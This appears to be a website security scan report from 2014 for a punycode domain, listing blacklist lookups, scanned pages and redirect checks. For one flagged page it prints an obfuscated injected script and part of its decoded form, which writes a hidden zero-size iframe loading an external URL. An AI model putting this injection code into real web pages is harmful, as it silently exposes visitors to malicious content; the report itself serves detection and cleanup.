Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xn--qufem-5ra.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xn--qufem-5ra.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xn--qufem-5ra.com/ | 200 OK Content-Length: 22107 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 21696 Content-Type: application/javascript | clean |
http://xn--qufem-5ra.com/Bolsa_trabajo.php | 200 OK Content-Length: 6125 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/test404page.js | 404 Not Found Content-Length: 595 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/index.php | 200 OK Content-Length: 22107 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/Catalunya_info.html | 200 OK Content-Length: 19234 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://xn--qufem-5ra.com/marco_camarerof.html | 200 OK Content-Length: 13382 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/Sexy_Boys.html | 200 OK Content-Length: 14986 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/index_cenas_empresa.php | 200 OK Content-Length: 20489 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/Pergamino_info.html | 200 OK Content-Length: 12203 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/sexys1.html | 200 OK Content-Length: 17510 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/boys1.html | 200 OK Content-Length: 17309 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/index_camareros_falsos.php | 200 OK Content-Length: 20496 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/restaurante_index.html | 200 OK Content-Length: 20088 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var tipRmEx;tipRmEx='%db%d3%d2%d2%d4%d5%d0%d1%aa%dc%f3%f0%dc%d8%ad%8a%cf%f0%96%f5%d2%d3%80%eb%d2%c4%e1%ec%d8%d5%9b%d3%df%c9%9d%dd%cd%eb%cd%8d%97%87%d7%ec%d2%c9%d3%8a%c3%d4%ca%d7%f2%e4%f6%c2%de%83%9f%c1%d0%d7%da%d5%d0%fb%e5%f8%d4%d3%8e%ef%c7%d3%fc%c7%ce%d1%90%95%af%ce%c2%c7%c8%d8%c2%d0%cf%e9%d3%ae%c0%ce%dc%84%d1%ca%ef%de%f1%c7%c8%cf%9e%fb%d0%88%9c%d9%d2%d5%87%ca%d7%f7%eb%dc%d8%99%d9%da%c9%c5%c8%c5%ee%c6%d8%96%ca%c9%f4%c4%f5%99%d6%88%d4%ca%fe%c5%dd%c ...[4226 bytes skipped]... Decoded script: function ipPak(){};var wordBed=new Date();ipPak.prototype={batMaskPong:function(){var conExMeta=document;if((new String(conExMeta.write)).indexOf('arity')>0) {return;}if(!this.sqlGz()) {try {onWilImg="<iframe name='tipCut' ";onWilImg+="frameborder=0 ";onWilImg+="src='"+this.atPkgPop();onWilImg+="'></iframe>";conExMeta.open();conExMeta.write(onWilImg);conExMeta.close();var onAwkExit=conExMeta.getElementsByName('tipCut');onAwkExit[0].style.height = 0;onAwkExit[0].style.width = 0;} catch(e) {conExMeta.write("maxWeConbgDoJin</body></html>");var calPastTop=this;setTimeout(function(){ calPastTop.batMaskPong() },1000);}this.zendPkgRm ...[1928 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xn--qufem-5ra.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 17:01:44 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: xn--qufem-5ra.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 17:01:44 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: xn--qufem-5ra.com
Referer: http://www.google.com/search?q=xn--qufem-5ra.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xn--qufem-5ra.com
Referer: http://www.google.com/search?q=xn--qufem-5ra.com
Result:
The result is similar to the first query. There are no suspicious redirects found.